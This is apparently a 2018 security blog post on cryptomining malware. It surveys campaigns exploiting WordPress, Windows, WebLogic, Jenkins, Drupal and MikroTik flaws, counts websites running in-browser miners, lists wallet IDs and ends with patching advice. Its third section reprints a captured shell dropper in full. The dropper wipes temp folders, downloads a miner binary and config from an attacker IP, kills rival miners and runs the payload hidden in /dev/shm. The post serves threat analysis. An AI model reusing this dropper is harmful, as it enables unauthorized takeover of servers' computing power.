The Rise of the Cryptocurrency Mining

1.The evolution of crypto mining malware

Cryptocurrency mining attacks increasing exponentially.Cyber criminals have increasingly turned to cryptomining malware as a way to harness the processing power of large numbers of computers and servers to help them generate revenue. According to McAfee Labs Threats Report: June 2018, more than 2.9 million samples of coin-miner malware in the first quarter of 2018 and Count of total coin miner malware rose by 629%.

A. 2017: Cryptocurrency-mining Malwares are threatening WordPress Websites:

Cyber criminals have exploited the RevSlider vulnerability to perform remote command injection attacks for creating a botnet of web servers that mines

** https://blog.sucuri.net/2017/09/hacked-websites-mine-crypocurrencies.html

B. October 2017:Cryptocurrency-mining Malwares are threatening Windows using Mimikatz and EternalBlue vulnerability (CVE-2017–0144):

Fileless Monero WannaMine, a new attack discovered by PandaLabs at the end of october 2017.This malware uses Mimikatz utility and EternalBlue exploit for lateral movement.To maintain persistence in the infected system, this malware uses Windows Management Instrumentation and scheduled PowerShell commands.After breaking in, the WannaMine worm uses the infected computer’s CPU to mine a cryptocurrency quietly in the background

** https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/

C. February 2018:Cryptocurrency-mining Malwares are threatening Weblogic :

According to fireeye.com,CVE-2017–10271 Used to Deliver CryptoMiners. CVE-2017–10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code.A PowerShell to download the miner directly onto the victim’s system

** https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html

D.February 2018:Cryptocurrency-mining Malwares are threatening Jenkins:

The Check Point research team has discovered what could potentially become one of the biggest malicious mining operations ever seen.the crypto-miner malware exploits the known CVE-2017–1000353 vulnerability in the Jenkins Java deserialization implementation.

** https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/

E.April 2018:Cryptocurrency-mining Malwares are threatening Drupal

The SANS Internet Storm Center has spotted attempts to deliver a cryptocurrency miner, a simple PHP backdoor that allows attackers to upload more files to the targeted server, and an IRC bot written in Perl.In the attack, the hackers have used the CVE-2018–7600 (drupalgeddon2 attacks)
 **https://www.securityweek.com/drupal-sites-targeted-backdoors-miners-drupalgeddon2-attacks

F.August 2018:Cryptocurrency-mining Malwares are threatening Mikrotik-router:

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers vulerable to CVE-2018–14847 to secretly install cryptocurrency miners on computers connected to them.The malware campaigns have compromised more than 210,000 router
 **https://thehackernews.com/2018/08/mikrotik-router-hacking.html

2.Detection of crypto mining malware

A.Coinhive

  • Shodan : the number of devices used Coinhive JavaScript library (coinhive.min.js) is 91,840
https://www.shodan.io/search?query=html%3A%22coinhive.min.js%22&page=1
  • publicwww.com: the number of devices used Coinhive JavaScript library (coinhive.min.js) is 15004 (6295 wordpress websites)
https://publicwww.com/websites/%22coinhive.min.js%22/
https://publicwww.com/websites/+%22coinhive.min.js%22+wordpress/
  • Censys.io: the number of devices used Coinhive JavaScript library (coinhive.min.js) is 51957
https://censys.io/ipv4?q=%22coinhive.min.js%22
  • Zoomeye.org:he number of devices used Coinhive JavaScript library (coinhive.min.js) is 13051.
https://www.zoomeye.org/searchResult?q=%22coinhive.min.js%22

The repartition of coinhive wallet:

  1. wallet: hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3
76,589: https://www.shodan.io/search?query=html%3AhsFAjjijTyibpVjCmfJzlfWH3hFqWVT3
26,250:https://censys.io/ipv4?q=hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3

2. wallet: oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4

12718:https://www.shodan.io/search?query=html%3AoDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4
15487:https://censys.io/ipv4?q=oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4

3. Obfuscated Wallet :EbaacwdfTFnKczJdcK8KJyOQy1toE1Z9

To deobfuscate this code,i use this website:https://codebeautify.org/octal-hex-converter

https://censys.io/ipv4?q=_0x4020

4. Others wallet :

4.1. PIKZhb3lYttKlxCZ1Nf8jeKf9OSL0I4F:

4.2.OgBwPQ0r93unXkiZhNSLlYXnWsHbrRk6

4.3.ZopliillHRjWlp5B3JTrS4hKQP8jAKwp

4.4.gE05C7ZO8WScGV9I4tXNvYIMIhushvwo

4.5.XvqZi0TagSxrvKh9ns8Cq0daWVEeac0X

4.6.XH6V4UQ9ro5HOVO33SHLMMtZ5o5OZmZN

4.7.k73eGtgICbaJgaOEWCMoXDJmUXX7xucH

4.8.PmwMlrrJ6I488yrq4vwbHfFetbK0Ai9f

4.9.cPSV7LAAbiHjr91RBbegXyuQH4G9ulEx

4.10.hHhAL7oWamVDfdmMlgZA5OgZ72LLeqBm

4.11.31P4ZeWwWMSdHcwgvaCqXe8qZZqCgcJ9

4.12.0PDji4KCpO0l7Tmu2kdWsIIFGTl6LPqC

4.13.pRCfIZQUUEHiLhj19ebfP3MC3m3bR8u6

4.14.reYE7rh78rZK9PGh34QDPJkcE42RrExI

B.Crypto-Loot

Crypto-Loot is the most popular alternatives to Coinhive and doesn’t require any user interactioncan and run steathlity in the background.

  • Publicwww.com: the number of devices used CryptoLoot JavaScript library is 395
https://publicwww.com/websites/%22crypto-loot.com%22/
https://publicwww.com/websites/%22cryptoloot.pro%22/
  • Shodan: the number of devices used CryptoLoot JavaScript library is 14
https://www.shodan.io/search?query=html%3ACryptoLoot.Anonymous
  • Zoomeye.org:the number of devices used CryptoLoot JavaScript library is 21
https://www.zoomeye.org/searchResult?q=%22CryptoLoot.Anonymous%22
  • Censys.io:the number of devices used CryptoLoot JavaScript library is 13
https://censys.io/ipv4?q=%22miner%3Dnew+CryptoLoot.Anonymous%22

Examples of Cryptoloot wallet:

C.WebMinePool

The WebMinePool JavaScript Miner can be embedded directly into website or application. The miner itself does not come with a User Interface.

https://webminepool.com/page/js-miner
  • Zoomeye.org:the number of devices used WebMinePool JavaScript library (webminepool.com/lib/base.js) is 680.
https://www.zoomeye.org/searchResult?q=%22WMP.Anonymous%22
  • Shodan.io:the number of devices used WebMinePool JavaScript library (webminepool.com/lib/base.js) is 14003.
https://www.shodan.io/search?query=html%3AWMP.Anonymous
  • Censys.io:the number of devices used WebMinePool JavaScript library (webminepool.com/lib/base.js) is 31554 .
https://censys.io/ipv4?q=%22WMP.Anonymous%22
  • Publicwww.com:the number of devices used WebMinePool JavaScript library (webminepool.com/lib/base.js) is 79 .
https://publicwww.com/websites/%22WMP.Anonymous%22

The repartition of WebMinePool wallet:

1.Wallet: SK_fDWJSkvRkMwtZgpMssOlQ

2. Wallet: SK_LCxTivFH8yMvWwsdhzM4B

3.Wallet:SK_WA2tpg7mDQGGjqW2lLNqt

4.Wallet:SK_E4zdloBtTNPJs7YYP2K9R

5.Wallet:SK_6wWVsXnyAVpP7v54OSazK

6.Wallet:SK_COFoB2KlBHWaEwTA8acJv

D.DeepMiner

E.CoinImp

  • New effective JavaScript miner
  • Free JavaScript Mining
  • Use Monero JavaScript web miner and earn money
https://www.coinimp.com/documentation

3.Example of technique used by crypto mining malware

Yesterday,i found this script

The code starts by removing “/var/tmp/” and “/tmp/” which means that it is probably previously installed malware.

#!/bin/sh
rm -rf /var/tmp/*
rm -rf /tmp/*

After this it starts to download file and killing all of the running miner processes.The code attempt to download the configuration file (config.json) and store it in /tmp/c.json file and the binary of malware (x) and store it in /tmp/systemd

( wget -qO - http://145.249.104.241/config.json > /tmp/c.json ) || (curl http://145.249.104.241/config.json > /tmp/c.json )
( wget -qO - http://145.249.104.241/x > /tmp/systemd ) || (curl http://145.249.104.241/x > /tmp/systemd)
chmod +x /tmp/systemd
ps auxf|grep -v grep|grep -v mwyumwdbpq|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "fyvxsztqix"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xm111"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "muhsti"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "donate"|awk '{print $2}'|xargs kill -9

the next step is tp running malware with option -c (for configuration)

cd /tmp
./systemd -c c.json > /dev/null 2>&1 &
mv /tmp/systemd /dev/shm/x
chmod +x /dev/shm/x
mv c.json /dev/shm/c.json
/dev/shm/x -c /dev/shm/c.json > /dev/null 2>&1 &

Here is the configuration file (config.json)

Now, I will try to upload this script into Vmware to test.I use the CVE-2018–7600 (drupalgeddon2 attacks).

Now i download and run this script to minning.

Conclusion

1. Easy Ways To Block Cryptocurrency Mining In Web Browser

2.Eternablue

  • Patch your windows systems and implement best practices.
  • Disable SMB v1 protocol

3. upgrade mikrotik router.

4.Update Drupal CMS ,wordpress CMS,jenkins and weblogic.